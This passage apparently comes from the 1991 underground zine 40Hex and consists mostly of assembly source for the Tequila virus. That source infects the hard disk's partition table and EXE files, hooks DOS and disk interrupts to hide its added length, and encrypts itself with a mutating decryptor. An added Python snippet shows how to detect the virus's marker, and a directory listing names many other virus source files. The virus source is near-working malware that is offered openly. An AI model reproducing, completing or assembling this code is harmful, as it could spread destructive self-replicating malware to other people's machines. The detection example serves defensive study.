MOV CX,W[07C30]
INC CX
MOV DX,W[07C32]
INT 013
RETF
DB 002, 0FE
DB 04C, 0E9
DB 080, 004
PUSH CS
POP DS
XOR AX,AX
MOV ES,AX
MOV BX,07C00
PUSH ES
PUSH BX
MOV AX,0201
MOV CX,W[0226]
MOV DX,W[0228]
INT 013
PUSH CS
POP ES
CLD
MOV SI,0409
MOV DI,09BE
MOV CX,046
REP MOVSB
MOV SI,091B
MOV DI,0A04
MOV CX,045
REP MOVSB
CLI
XOR AX,AX
MOV ES,AX
ES LES BX,[070] ;Masm Mod. Needed
MOV W[09B0],BX ;Masm Mod. Needed
MOV W[09B2],ES ;Masm Mod. Needed
MOV ES,AX
ES LES BX,[084] ;Masm Mod. Needed
MOV W[09B4],BX ;Masm Mod. Needed
MOV W[09B6],ES ;Masm Mod. Needed
MOV ES,AX
ES MOV W[070],044F ;Masm Mod. Needed
ES MOV W[072],DS ;Masm Mod. Needed
STI
RETF
INSTALL:
CALL NEXT_LINE
NEXT_LINE:
POP SI
SUB SI,028F
PUSH SI
PUSH AX
PUSH ES
PUSH CS
POP DS
MOV AX,ES
ADD W[SI+2],AX
ADD W[SI+4],AX
DEC AX
MOV ES,AX
MOV AX,0FE02
INT 021
CMP AX,01FD
JE NO_PARTITION_INFECTION
ES CMP B[0],05A ;Masm Mod. Needed
JNE NO_PARTITION_INFECTION
ES CMP W[3],0BB ;Masm Mod. Needed
JBE NO_PARTITION_INFECTION
ES MOV AX,W[012] ;Masm Mod. Needed
SUB AX,0BB
MOV ES,AX
XOR DI,DI
MOV CX,09A4
CLD
REP MOVSB
PUSH ES
POP DS
CALL INFECT_PARTITION_TABLE
NO_PARTITION_INFECTION:
POP ES
POP AX
PUSH ES
POP DS
POP SI
CS MOV SS,W[SI+4] ;Masm Mod. Needed
CHAIN_TO_THE_HOST_FILE:
CS JMP D[SI] ;Masm Mod. Needed
INFECT_PARTITION_TABLE:
MOV AH,02A
INT 021
MOV W[6],CX ;Masm Mod. Needed
MOV W[8],DX ;Masm Mod. Needed
MOV AH,052
INT 021
ES MOV AX,W[BX-2] ;Masm Mod. Needed
MOV W[03E8],AX ;Masm Mod. Needed
MOV AX,03513
INT 021
MOV W[09A0],BX ;Masm Mod. Needed
MOV W[09A2],ES ;Masm Mod. Needed
MOV AX,03501
INT 021
MOV SI,BX
MOV DI,ES
MOV AX,02501
MOV DX,03DA
INT 021
MOV B[0A],0 ;Masm Mod. Needed
PUSHF
POP AX
OR AX,0100
PUSH AX
POPF
MOV AX,0201
MOV BX,09A4
MOV CX,1
MOV DX,080
PUSH DS
POP ES
PUSHF
CALL D[09A0] ;Masm Mod. Needed
PUSHF
POP AX
AND AX,0FEFF
PUSH AX
POPF
PUSHF
MOV AX,02501
MOV DX,SI
MOV DS,DI
INT 021
POPF
JAE 0450 ;Masm Mod. Needed
JMP RET ;Masm Mod. Needed
PUSH ES
POP DS
CMP W[BX+02E],0FE02
JNE 045C ;Masm Mod. Needed
JMP RET ;Masm Mod. Needed
ADD BX,01BE
MOV CX,4
MOV AL,B[BX+4]
CMP AL,4
JE 0479 ;Masm Mod. Needed
CMP AL,6
JE 0479 ;Masm Mod. Needed
CMP AL,1
JE 0479 ;Masm Mod. Needed
ADD BX,010
LOOP 0463 ;Masm Mod. Needed
JMP SHORT RET ;Masm Mod. Needed
MOV DL,080
MOV DH,B[BX+5]
MOV W[0228],DX ;Masm Mod. Needed
MOV AX,W[BX+6]
MOV CX,AX
MOV SI,6
AND AX,03F
CMP AX,SI
JBE RET ;Masm Mod. Needed
SUB CX,SI
MOV DI,BX
INC CX
MOV W[0226],CX ;Masm Mod. Needed
MOV AX,0301
MOV BX,09A4
PUSHF
CALL D[09A0] ;Masm Mod. Needed
JB RET ;Masm Mod. Needed
DEC CX
MOV W[DI+6],CX
INC CX
SUB W[DI+0C],SI
SBB W[DI+0E],0
MOV AX,0305
MOV BX,0
INC CX
PUSHF
CALL D[09A0] ;Masm Mod. Needed
JB RET ;Masm Mod. Needed
MOV SI,01F6
MOV DI,09A4
MOV CX,034
CLD
REP MOVSB
MOV AX,0301
MOV BX,09A4
MOV CX,1
XOR DH,DH
PUSHF
CALL D[09A0] ;Masm Mod. Needed
RET
NEW_INTERRUPT_ONE:
PUSH BP
MOV BP,SP
CS CMP B[0A],1 ;Masm Mod. Needed
JE 0506 ;Masm Mod. Needed
CMP W[BP+4],09B4
JA 050B ;Masm Mod. Needed
PUSH AX
PUSH ES
LES AX,[BP+2]
CS MOV W[09A0],AX ;Masm Mod. Needed
CS MOV W[09A2],ES ;Masm Mod. Needed
CS MOV B[0A],1
POP ES
POP AX
AND W[BP+6],0FEFF
POP BP
IRET
NEW_INTERRUPT_13:
CMP CX,1
JNE 054E ;Masm Mod. Needed
CMP DX,080
JNE 054E ;Masm Mod. Needed
CMP AH,3
JA 054E ;Masm Mod. Needed
CMP AH,2
JB 054E ;Masm Mod. Needed
PUSH CX
PUSH DX
DEC AL
JE 0537 ;Masm Mod. Needed
PUSH AX
PUSH BX
ADD BX,0200
INC CX
PUSHF
CS CALL D[09A0] ;Masm Mod. Needed
POP BX
POP AX
MOV AL,1
CS MOV CX,W[0226] ;Masm Mod. Needed
CS MOV DX,W[0228] ;Masm Mod. Needed
PUSHF
CS CALL D[09A0] ;Masm Mod. Needed
POP DX
POP CX
RETF 2
CS JMP D[09A0] ;Masm Mod. Needed
NEW_TIMER_TICK_INTERRUPT:
PUSH AX
PUSH BX
PUSH ES
PUSH DS
XOR AX,AX
MOV ES,AX
PUSH CS
POP DS
ES LES BX,[084] ;Masm Mod. Needed
MOV AX,ES
CMP AX,0800
JA 05B0 ;Masm Mod. Needed
CMP AX,W[09B6]
JNE 0575 ;Masm Mod. Needed
CMP BX,W[09B4]
JE 05B0 ;Masm Mod. Needed
MOV W[09B4],BX ;Masm Mod. Needed
MOV W[09B6],ES ;Masm Mod. Needed
XOR AX,AX
MOV DS,AX
CS LES BX,[09B0] ;Masm Mod. Needed
MOV W[070],BX ;Masm Mod. Needed
MOV W[072],ES ;Masm Mod. Needed
LES BX,[04C] ;Masm Mod. Needed
CS MOV W[09A0],BX ;Masm Mod. Needed
CS MOV W[09A2],ES ;Masm Mod. Needed
MOV W[04C],09BE ;Masm Mod. Needed
MOV W[04E],CS ;Masm Mod. Needed
MOV W[084],04B1 ;Masm Mod. Needed
MOV W[086],CS ;Masm Mod. Needed
POP DS
POP ES
POP BX
POP AX
IRET
INT_21_INTERCEPT:
CMP AH,011
JB CHECK_FOR_HANDLE
CMP AH,012
JA CHECK_FOR_HANDLE
CALL ADJUST_FCB_MATCHES
RETF 2
CHECK_FOR_HANDLE:
CMP AH,04E
JB CHECK_FOR_PREVIOUS_INSTALLATION
CMP AH,04F
JA CHECK_FOR_PREVIOUS_INSTALLATION
CALL ADJUST_HANDLE_MATCHES
RETF 2
CHECK_FOR_PREVIOUS_INSTALLATION:
CMP AX,0FE02
JNE CHECK_FOR_MESSAGE_PRINT
NOT AX
IRET
CHECK_FOR_MESSAGE_PRINT:
CMP AX,0FE03
JNE CHECK_FOR_EXECUTE
CS CMP W[6],0 ;Masm Mod. Needed
JNE CHAIN_TO_TRUE_INT_21
CALL PRINT_MESSAGE
IRET
CHECK_FOR_EXECUTE:
CMP AX,04B00
JE SET_STACK
CMP AH,04C
JNE CHAIN_TO_TRUE_INT_21
SET_STACK:
CS MOV W[09A6],SP ;Masm Mod. Needed
CS MOV W[09A8],SS ;Masm Mod. Needed
CLI
PUSH CS
POP SS
MOV SP,0AE5
STI
CMP AH,04C
JNE TO_AN_INFECTION
CALL PROGRAM_TERMINATION_ROUTINE
JMP SHORT NO_INFECTION
TO_AN_INFECTION:
CALL INFECT_THE_FILE
NO_INFECTION:
CLI
CS MOV SS,W[09A8] ;Masm Mod. Needed
CS MOV SP,W[09A6] ;Masm Mod. Needed
STI
JMP SHORT CHAIN_TO_TRUE_INT_21
CHAIN_TO_TRUE_INT_21:
CS INC W[09BC] ;Masm Mod. Needed
CS JMP D[09B4] ;Masm Mod. Needed
NEW_CRITICAL_ERROR_HANDLER:
MOV AL,3
IRET
ADJUST_FCB_MATCHES:
PUSH BX
PUSH ES
PUSH AX
MOV AH,02F
CALL INT_21
POP AX
PUSHF
CS CALL D[09B4] ;Masm Mod. Needed
PUSHF
PUSH AX
CMP AL,0FF
JE 0664 ;Masm Mod. Needed
ES CMP B[BX],0FF ;Masm Mod. Needed
JNE 064F ;Masm Mod. Needed
ADD BX,7
ES MOV AL,B[BX+017] ;Masm Mod. Needed
AND AL,01F
CMP AL,01F
JNE 0664 ;Masm Mod. Needed
ES SUB W[BX+01D],09A4 ;Masm Mod. Needed
ES SBB W[BX+01F],0 ;Masm Mod. Needed
POP AX
POPF
POP ES
POP BX
RET
ADJUST_HANDLE_MATCHES:
PUSH BX
PUSH ES
PUSH AX
MOV AH,02F
CALL INT_21
POP AX
PUSHF
CS CALL D[09B4] ;Masm Mod. Needed
PUSHF
PUSH AX
JB 0691 ;Masm Mod. Needed
ES MOV AL,B[BX+016] ;Masm Mod. Needed
AND AL,01F
CMP AL,01F
JNE 0691 ;Masm Mod. Needed
ES SUB W[BX+01A],09A4 ;Masm Mod. Needed
ES SBB W[BX+01C],0 ;Masm Mod. Needed
POP AX
POPF
POP ES
POP BX
RET
WRITE_TO_THE_FILE:
MOV AH,040
JMP 069C ;Masm Mod. Needed
READ_FROM_THE_FILE:
MOV AH,03F
CALL 06B4 ;Masm Mod. Needed
JB RET ;Masm Mod. Needed
SUB AX,CX
RET
MOVE_TO_END_OF_FILE:
XOR CX,CX
XOR DX,DX
MOV AX,04202
JMP 06B4 ;Masm Mod. Needed
MOVE_TO_BEGINNING_OF_FILE:
XOR CX,CX
XOR DX,DX
MOV AX,04200
CS MOV BX,W[09A4] ;Masm Mod. Needed
INT_21:
CLI
PUSHF
CS CALL D[09B4] ;Masm Mod. Needed
RET
INFECT_THE_FILE:
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH ES
PUSH DS
CALL CHECK_LETTERS_IN_FILENAME
JAE GOOD_NAME
JMP BAD_NAME
GOOD_NAME:
PUSH DX
PUSH DS
PUSH CS
POP DS
SAVE_AND_REPLACE_CRITICAL_ERROR_HANDLER:
MOV AX,03524
CALL INT_21
MOV W[09B8],BX ;Masm Mod. Needed
MOV W[09BA],ES ;Masm Mod. Needed
MOV AX,02524
MOV DX,052A
CALL INT_21
POP DS
POP DX
SAVE_AND_REPLACE_FILE_ATTRIBUTE:
MOV AX,04300
CALL INT_21
CS MOV W[09AA],CX ;Masm Mod. Needed
JAE 06FE ;Masm Mod. Needed
JMP RESTORE_CRIT_HANDLER
MOV AX,04301
XOR CX,CX
CALL INT_21
JB 077C ;Masm Mod. Needed
OPEN_FILE_FOR_READ_WRITE:
MOV AX,03D02
CALL INT_21
JB 0771 ;Masm Mod. Needed
PUSH DX
PUSH DS
PUSH CS
POP DS
MOV W[09A4],AX ;Masm Mod. Needed
GET_FILEDATE:
MOV AX,05700
CALL 06B4 ;Masm Mod. Needed
JB 075C ;Masm Mod. Needed
MOV W[09AC],DX ;Masm Mod. Needed
MOV W[09AE],CX ;Masm Mod. Needed
READ_AND_CHECK_EXE_HEADER:
CALL 06AD ;Masm Mod. Needed
MOV DX,0A49
MOV CX,01C
CALL 069A ;Masm Mod. Needed
JB 075C ;Masm Mod. Needed
PUSH DS
POP ES
MOV DI,0E8
MOV CX,020
CMP W[0A49],05A4D ;Masm Mod. Needed
JNE 075C ;Masm Mod. Needed
MOV AX,W[0A5B]
CLD
REPNE SCASW
JNE 0754 ;Masm Mod. Needed
OR W[09AE],01F ;Masm Mod. Needed
JMP 075C ;Masm Mod. Needed
CALL READ_PAST_END_OF_FILE
JB 075C ;Masm Mod. Needed
CALL ENCRYPT_AND_WRITE_TO_FILE
RESTORE_ALTERED_DATE:
MOV AX,05701
MOV DX,W[09AC]
MOV CX,W[09AE]
CALL 06B4 ;Masm Mod. Needed
CLOSE_THE_FILE:
MOV AH,03E
CALL 06B4 ;Masm Mod. Needed
RESTORE_FILE_ATTRIBUTE:
POP DS
POP DX
MOV AX,04301
CS MOV CX,W[09AA] ;Masm Mod. Needed
CALL INT_21
RESTORE_CRIT_HANDLER:
MOV AX,02524
CS LDS DX,[09B8] ;Masm Mod. Needed
CALL INT_21
BAD_NAME:
POP DS
POP ES
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
RET
CHECK_LETTERS_IN_FILENAME:
PUSH DS
POP ES
MOV DI,DX
MOV CX,-1
XOR AL,AL
CLD
REPNE SCASB
NOT CX
MOV DI,DX
MOV AX,04353
MOV SI,CX
SCASW
JE 07B7 ;Masm Mod. Needed
DEC DI
LOOP 07A5 ;Masm Mod. Needed
MOV CX,SI
MOV DI,DX
MOV AL,056
REPNE SCASB
JE 07B7 ;Masm Mod. Needed
CLC
RET
STC
RET
READ_PAST_END_OF_FILE:
MOV CX,-1
MOV DX,-0A
CALL 06A8 ;Masm Mod. Needed
MOV DX,0A65
MOV CX,8
CALL 069A ;Masm Mod. Needed
JB RET ;Masm Mod. Needed
CMP W[0A65],0FDF0 ;Masm Mod. Needed
JNE 07F0 ;Masm Mod. Needed
CMP W[0A67],0AAC5 ;Masm Mod. Needed
JNE 07F0 ;Masm Mod. Needed
MOV CX,-1
MOV DX,-9
CALL 06A8 ;Masm Mod. Needed
MOV DX,0A6B
MOV CX,4
CALL 0696 ;Masm Mod. Needed
RET
CLC
RET
ENCRYPT_AND_WRITE_TO_FILE:
CALL MOVE_TO_END_OF_FILE
MOV SI,AX
MOV DI,DX
MOV BX,0A49
MOV AX,W[BX+4]
MUL W[0D] ;Masm Mod. Needed
SUB AX,SI
SBB DX,DI
JAE 080C ;Masm Mod. Needed
JMP OUT_OF_ENCRYPT
MOV AX,W[BX+8]
MUL W[0B] ;Masm Mod. Needed
SUB SI,AX
SBB DI,DX
MOV AX,W[BX+0E]
MOV W[4],AX ;Masm Mod. Needed
ADD W[4],010 ;Masm Mod. Needed
MUL W[0B] ;Masm Mod. Needed
ADD AX,W[BX+010]
SUB AX,SI
SBB DX,DI
JB 083C ;Masm Mod. Needed
SUB AX,080
SBB DX,0
JB RET ;Masm Mod. Needed
ADD W[BX+0E],09B
MOV AX,W[BX+016]
ADD AX,010
MOV W[2],AX ;Masm Mod. Needed
MOV AX,W[BX+014]
MOV W[0],AX ;Masm Mod. Needed
CALL 06A4 ;Masm Mod. Needed
ADD AX,09A4
ADC DX,0
DIV W[0D] ;Masm Mod. Needed
INC AX
MOV W[0A4D],AX ;Masm Mod. Needed
MOV W[0A4B],DX ;Masm Mod. Needed
MOV DX,DI
MOV AX,SI
DIV W[0B] ;Masm Mod. Needed
MOV W[0A5F],AX ;Masm Mod. Needed
MOV BX,DX
ADD DX,0960
MOV W[0A5D],DX ;Masm Mod. Needed
CALL COPY_TO_HIGH_MEMORY_ENCRYPT_WRITE
JB RET ;Masm Mod. Needed
OR W[09AE],01F ;Masm Mod. Needed
MOV BX,W[09BC]
AND BX,01F
SHL BX,1
MOV AX,W[BX+0E8]
MOV W[0A5B],AX ;Masm Mod. Needed
CALL MOVE_TO_BEGINNING_OF_FILE
MOV CX,01C
MOV DX,0A49
WRITE_THE_NEW_HEADER:
CALL 0696 ;Masm Mod. Needed
OUT_OF_ENCRYPT:
RET
COPY_TO_HIGH_MEMORY_ENCRYPT_WRITE:
PUSH BP
XOR AH,AH
INT 01A
MOV AX,DX
MOV BP,DX
PUSH DS
POP ES
MOV DI,0960
MOV SI,DI
MOV CX,020
CLD
REP STOSW
XOR DX,DX
MOV ES,DX
CALL ENCRYPT_STEP_ONE
CALL ENCRYPT_STEP_TWO
CALL ENCRYPT_STEP_THREE
MOV B[SI],0E9
MOV DI,028C
SUB DI,SI
SUB DI,3
INC SI
MOV W[SI],DI
MOV AX,0A04
CALL AX
POP BP
RET
ENCRYPT_STEP_ONE:
DEC BP
ES TEST B[BP],2 ;Masm Mod. Needed
JNE 08EB ;Masm Mod. Needed
MOV B[SI],0E
INC SI
CALL GARBLER
MOV B[SI],01F
INC SI
CALL GARBLER
RET
MOV W[SI],0CB8C
INC SI
INC SI
CALL GARBLER
MOV W[SI],0DB8E
INC SI
INC SI
CALL GARBLER
RET
ENCRYPT_STEP_TWO:
AND CH,0FE
DEC BP
ES TEST B[BP],2 ;Masm Mod. Needed
JE 0920 ;Masm Mod. Needed
OR CH,1
MOV B[SI],0BE
INC SI
MOV W[SI],BX
INC SI
INC SI
CALL GARBLER
ADD BX,0960
TEST CH,1
JE 0934 ;Masm Mod. Needed
MOV B[SI],0BB
INC SI
MOV W[SI],BX
INC SI
INC SI
CALL GARBLER
ADD BX,0960
TEST CH,1
JE 090C ;Masm Mod. Needed
SUB BX,0960
CALL GARBLER
MOV B[SI],0B9
INC SI
MOV AX,0960
MOV W[SI],AX
INC SI
INC SI
CALL GARBLER
CALL GARBLER
RET
ENCRYPT_STEP_THREE:
MOV AH,014
MOV DH,017
TEST CH,1
JE 0958 ;Masm Mod. Needed
XCHG DH,AH
MOV DI,SI
MOV AL,08A
MOV W[SI],AX
INC SI
INC SI
CALL GARBLER
XOR DL,DL
MOV B[0A39],028 ;Masm Mod. Needed
DEC BP
ES TEST B[BP],2 ;Masm Mod. Needed
JE 0978 ;Masm Mod. Needed
MOV DL,030
MOV B[0A39],DL ;Masm Mod. Needed
MOV W[SI],DX
INC SI
INC SI
MOV W[SI],04346
INC SI
INC SI
CALL GARBLER
MOV AX,0FE81
MOV CL,0BE
TEST CH,1
JE 0993 ;Masm Mod. Needed
MOV AH,0FB
MOV CL,0BB
MOV W[SI],AX
INC SI
INC SI
PUSH BX
ADD BX,040
MOV W[SI],BX
INC SI
INC SI
POP BX
MOV B[SI],072
INC SI
MOV DX,SI
INC SI
CALL GARBLER
MOV B[SI],CL
INC SI
MOV W[SI],BX
INC SI
INC SI
MOV AX,SI
SUB AX,DX
DEC AX
MOV BX,DX
MOV B[BX],AL
CALL GARBLER
CALL GARBLER
MOV B[SI],0E2
INC SI
SUB DI,SI
DEC DI
MOV AX,DI
MOV B[SI],AL
INC SI
CALL GARBLER
RET
GARBLER:
DEC BP
ES TEST B[BP],0F ;Masm Mod. Needed
JE RET ;Masm Mod. Needed
DEC BP
ES MOV AL,B[BP] ;Masm Mod. Needed
TEST AL,2
JE 0A0E ;Masm Mod. Needed
TEST AL,4
JE 09F7 ;Masm Mod. Needed
TEST AL,8
JE 09F1 ;Masm Mod. Needed
MOV W[SI],0C789
INC SI
INC SI
JMP RET ;Masm Mod. Needed
MOV B[SI],090
INC SI
JMP RET ;Masm Mod. Needed
MOV AL,085
DEC BP
ES MOV AH,B[BP] ;Masm Mod. Needed
TEST AH,2
JE 0A05 ;Masm Mod. Needed
DEC AL
OR AH,0C0
MOV W[SI],AX
INC SI
INC SI
JMP RET ;Masm Mod. Needed
DEC BP
ES TEST B[BP],2 ;Masm Mod. Needed
JE 0A1A ;Masm Mod. Needed
MOV AL,039
JMP 09F9 ;Masm Mod. Needed
MOV B[SI],0FC
INC SI
RET
MAKE_THE_DISK_WRITE:
CALL PERFORM_ENCRYPTION_DECRYPTION
MOV AH,040
MOV BX,W[09A4]
MOV DX,0
MOV CX,09A4
PUSHF
CALL D[09B4] ;Masm Mod. Needed
JB 0A37 ;Masm Mod. Needed
SUB AX,CX
PUSHF
CMP B[0A39],028 ;Masm Mod. Needed
JNE 0A44 ;Masm Mod. Needed
MOV B[0A39],0 ;Masm Mod. Needed
CALL PERFORM_ENCRYPTION_DECRYPTION
POPF
RET
PERFORM_ENCRYPTION_DECRYPTION:
MOV BX,0
MOV SI,0960
MOV CX,0960
MOV DL,B[SI]
XOR B[BX],DL
INC SI
INC BX
CMP SI,09A0
JB 0A61 ;Masm Mod. Needed
MOV SI,0960
LOOP 0A52 ;Masm Mod. Needed
RET
THE_FILE_DECRYPTING_ROUTINE:
PUSH CS
POP DS
MOV BX,4
MOV SI,0964
MOV CX,0960
MOV DL,B[SI]
ADD B[BX],DL
INC SI
INC BX
CMP SI,09A4
JB 0A7E ;Masm Mod. Needed
MOV SI,0964
LOOP 0A6F ;Masm Mod. Needed
JMP 0390 ;Masm Mod. Needed
;========== THE FOLLOWING IS NOT PART OF THE VIRUS ========
;========== BUT IS MERELY THE BOOSTER. ========
START:
LEA W[0104],EXIT ;Masm Mod. Needed
MOV W[0106],CS ;Masm Mod. Needed
MOV BX,CS
SUB W[0106],BX ;Masm Mod. Needed
JMP INSTALL
EXIT:
INT 020
TEQUILA ENDP
CODE_SEG ENDS
END TEQUILA
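A defender's reading of ADJUST_HANDLE_MATCHES in the listing above, as an added Python example (not part of the original article): the handler treats a seconds field of 01F in the file time as the infection marker and subtracts 09A4 bytes from the reported size, so comparing a trusted directory view with the live one exposes both. The DTA layout is the standard DOS FindFirst record; the cross-view comparison, the file names and the sizes are assumptions constructed for illustration.

```python
import struct

# Values taken from ADJUST_HANDLE_MATCHES in the listing above.
MARKER_SEC_FIELD = 0x1F   # AND AL,01F / CMP AL,01F on the low byte of the time word
HIDDEN_LENGTH = 0x09A4    # SUB W[BX+01A],09A4 / SBB W[BX+01C],0 on the size dword

# Standard DOS FindFirst/FindNext DTA: 21 reserved bytes, attribute at 0x15,
# time at 0x16, date at 0x18, size at 0x1A, ASCIIZ name at 0x1E (43 bytes).
DTA = struct.Struct("<21sBHHI13s")

def make_dta(name, size, hour, minute, sec_field):
    """Build a constructed DTA record for the samples below."""
    time_word = (hour << 11) | (minute << 5) | sec_field
    date_word = ((1991 - 1980) << 9) | (12 << 5) | 1   # 1991-12-01
    return DTA.pack(b"\0" * 21, 0x20, time_word, date_word, size,
                    name.encode("ascii"))

def parse_dta(rec):
    """Return (name, size, seconds field) from one 43-byte DTA record."""
    _, _, time_word, _, size, raw = DTA.unpack(rec)
    name = raw.split(b"\0", 1)[0].decode("ascii")
    return name, size, time_word & 0x1F

def cross_view(clean_recs, live_recs):
    """Compare a trusted view (clean boot) with the running system's view."""
    live = {n: s for n, s, _ in map(parse_dta, live_recs)}
    findings = {}
    for name, size, sec in map(parse_dta, clean_recs):
        if sec != MARKER_SEC_FIELD:
            findings[name] = "clean"
        elif name in live and size - live[name] == HIDDEN_LENGTH:
            findings[name] = "marked, size hidden by resident hook"
        else:
            findings[name] = "marked, size not hidden"
    return findings

# Constructed sample data (hypothetical file names and sizes).
CLEAN_VIEW = [make_dta("EDIT.EXE", 40000 + HIDDEN_LENGTH, 10, 15, 0x1F),
              make_dta("SORT.EXE", 6938, 9, 30, 12),
              make_dta("MORE.EXE", 12000, 8, 0, 0x1F)]
LIVE_VIEW = [make_dta("EDIT.EXE", 40000, 10, 15, 0x1F),
             make_dta("SORT.EXE", 6938, 9, 30, 12),
             make_dta("MORE.EXE", 12000, 8, 0, 0x1F)]

if __name__ == "__main__":
    for name, verdict in cross_view(CLEAN_VIEW, LIVE_VIEW).items():
        print(f"{name:12} {verdict}")
```

A seconds field of 01F decodes to 62 seconds, which no real clock produces, so the marker alone is worth flagging even when the sizes agree.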
--------------------------------------------------------------------------------
40Hex Issue 4 December 1991
Left Blank
Cause it's bad
luck
how about something real dumb like....
Directory of C:\TASM
. <DIR> 11-28-91 11:44a
.. <DIR> 11-28-91 11:44a
LAB <DIR> 12-10-91 8:45p
1605 ASM 38553 12-09-91 12:31p
911 ASM 19267 12-10-91 7:21p
911 SDF 7084 12-10-91 10:41p
BBRAINS ASM 8990 08-06-91 3:04p
BMONDAY ASM 21455 12-09-91 12:31p
BOBVIRUS ASM 21280 12-14-91 4:38p
BRU_TEST COM 11 12-16-91 1:52p
CANCER ASM 2600 02-09-91 12:38a
DARTH2 ASM 8938 12-09-91 11:50a
DEADPOOL ASM 5324 12-14-91 1:00a
DIR2SCAN ASM 892 12-22-91 1:17a
DIR2SCAN COM 112 12-22-91 1:17a
EMFII ASM 16755 12-08-91 10:55p
FILES DOC 2373 12-11-91 9:58a
FUNNY ASM 5807 12-18-91 12:46p
FUNNY COM 208 12-18-91 12:46p
GREP DOC 13619 03-13-91 2:02a
HAPPY ASM 5667 12-18-91 12:32p
HAPPY MAP 34 12-25-91 11:27a
HEADER 94 12-09-91 10:25a
JOKER ASM 16258 11-10-91 10:55p
KILL-FSP ASM 1475 11-12-91 4:28p
KILL-FSP COM 55 12-25-91 11:26a
KILL-FSP EXE 823 12-25-91 11:26a
KILL-FSP MAP 103 12-25-91 11:26a
KILL-FSP OBJ 195 12-25-91 11:26a
MAKE EXE 37056 03-13-91 2:02a
MANUAL DOC 52126 03-13-91 2:02a
MBIOS MAC 13380 03-13-91 2:02a
MG-1 ASM 4527 12-17-91 10:58a
MG-1 SDF 2319 12-17-91 10:58a
NAILME ASM 206 12-18-91 10:01p
NAILME COM 100 12-19-91 10:26a
OBJXREF DOC 18404 03-13-91 2:02a
PARITY ASM 5837 12-09-91 12:49p
PH-VIR1 TXT 22086 11-04-91 9:00p
PROLOG DOC 23811 03-13-91 2:02a
RAGE ASM 9335 11-29-91 12:17p
SR EXE 117543 10-30-89 8:00a
SURVEY DOC 4479 11-29-91 1:01p
TASM EXE 106521 03-13-91 2:02a
TASM TAH 167927 03-13-91 2:02a
TCREF DOC 4954 03-13-91 2:02a
TCREF EXE 7856 03-13-91 2:02a
TD EXE 409360 03-13-91 2:02a
TDCONFIG TD 1208 12-06-91 12:01p
TDCONVRT EXE 35366 03-13-91 2:02a
TDDEV EXE 8544 03-13-91 2:02a
TDHELP TDH 126541 03-13-91 2:02a
TDINST EXE 107638 03-13-91 2:02a
TDMAP EXE 16944 03-13-91 2:02a
TDMEM EXE 14256 12-24-91 8:19p
TDNMI COM 644 03-13-91 2:02a
TDPACK EXE 25520 03-13-91 2:02a
TDREMOTE EXE 20738 03-13-91 2:02a
TDRF EXE 17376 03-13-91 2:02a
TDSTRIP EXE 13868 03-13-91 2:02a
TDUMP EXE 70554 03-13-91 2:02a
THELP COM 9912 11-28-91 11:46a
THELP DOC 7619 03-13-91 2:02a
TINY ASM 4233 01-01-80 12:26a
TINY TXT 92 01-01-80 12:25a
TINYB ASM 4404 01-01-80 12:32a
TINYB TXT 89 01-01-80 12:31a
TINYC ASM 4669 01-01-80 12:14a
TINYC TXT 118 01-01-80 12:31a
TINYD ASM 5486 01-01-80 12:02a
TINYE ASM 6464 01-01-80 12:09a
TLIB EXE 35668 03-13-91 2:02a
TLINK DOC 3837 03-13-91 2:02a
TLINK EXE 53510 03-13-91 2:02a
TOUCH COM 5118 03-13-91 2:02a
UPDATE DOC 20266 03-13-91 2:02a
VIENNA ASM 26395 09-30-87 12:59a
VIOL-C ASM 19096 12-16-91 10:25p
VSAFE COM 32050 03-28-91 1:00p
VWATCH COM 12263 03-28-91 1:00p
WIN COM 19358 12-24-91 9:52p
WINFIX ASM 2603 12-21-91 8:18p
WINFIX COM 357 12-24-91 9:52p
WINFIX MAP 103 12-24-91 9:52p
WINFIX OBJ 553 12-24-91 9:52p
85 file(s) 1939259 bytes
Directory of C:\TASM\LAB
. <DIR> 12-10-91 8:45p
.. <DIR> 12-10-91 8:45p
LAB <DIR> 12-10-91 8:46p
AMAG0589 TXT 46529 05-21-89 7:06p
AMAG1289 TXT 113270 12-16-89 12:21p
BIT ASM 778 08-30-91 8:33p
BIT MAP 103 12-24-91 11:31p
BIT OBJ 192 12-24-91 11:31p
BUGOFF ASM 903 12-25-91 11:59a
BUGOFF COM 43 12-25-91 11:59a
BUGOFF MAP 103 12-25-91 11:59a
BUGOFF OBJ 198 12-25-91 11:59a
CRACK-W ASM 1430 12-24-91 7:49p
CRACK-W MAP 103 12-24-91 7:47p
DIR ASM 10274 12-25-91 12:46a
DIR MAP 99 12-25-91 12:48a
DIR OBJ 961 12-25-91 12:48a
DIR SDF 5032 12-25-91 12:46a
DL ASM 416 12-14-91 6:35p
DUMB DOC 52346 12-19-91 1:46p
ENW 3 12-19-91 6:02p
EXE_FILE ASM 80 12-24-91 12:36a
EXE_FILE EXE 516 12-24-91 12:36a
EXE_FILE MAP 220 12-24-91 12:36a
EXE_FILE OBJ 183 12-24-91 12:36a
FUCK_UP DOC 198 12-23-91 10:33a
FUNGUS ASM 17120 12-21-91 1:37p
FUNGUS SDF 4933 12-21-91 1:34p
HAP ASM 2440 12-16-91 12:42p
HAPPY ASM 7144 12-25-91 11:30a
HAPPY COM 248 12-25-91 11:28a
HAPPY MAP 99 12-25-91 11:28a
HAPPY OBJ 424 12-25-91 11:28a
HEADER 94 12-09-91 10:25a
KENNEDY ASM 6663 12-25-91 12:43a
KENNEDY SDF 2803 12-25-91 12:43a
KILL ASM 517 12-19-91 6:05p
MAR-INST BAT 205 08-31-91 12:13a
MAR-INST DOC 1037 08-31-91 12:20a
MARAUDER ASM 21997 12-23-91 10:21a
MARAUDER DOC 2305 12-20-91 9:40a
MAR_ASM! ZIP 5361 12-23-91 10:35a
MODES ASM 244 12-25-91 7:22p
MODES COM 7 12-25-91 7:22p
MODES MAP 99 12-25-91 7:22p
MODES OBJ 136 12-25-91 7:22p
NEW ASM 21997 12-23-91 10:21a
NEW COM 869 12-25-91 12:12a
NEW MAP 103 12-25-91 12:12a
NEW OBJ 1261 12-25-91 12:12a
NEW_KILL ASM 1318 12-23-91 10:29a
NEXT ASM 2208 12-25-91 12:41a
PS ANS 3218 11-25-91 9:43p
SECTOR ASM 1573 12-11-91 10:52p
SS DOC 270 08-08-91 3:00p
SS EXE 6898 08-08-91 3:00p
TARGET ASM 472 12-20-91 3:32p
TARGET COM 100 12-25-91 8:53p
TARGET MAP 103 12-25-91 8:53p
TARGET OBJ 261 12-25-91 8:53p
60 file(s) 348507 bytes
Directory of C:\TASM\LAB\LAB
. <DIR> 12-10-91 8:46p
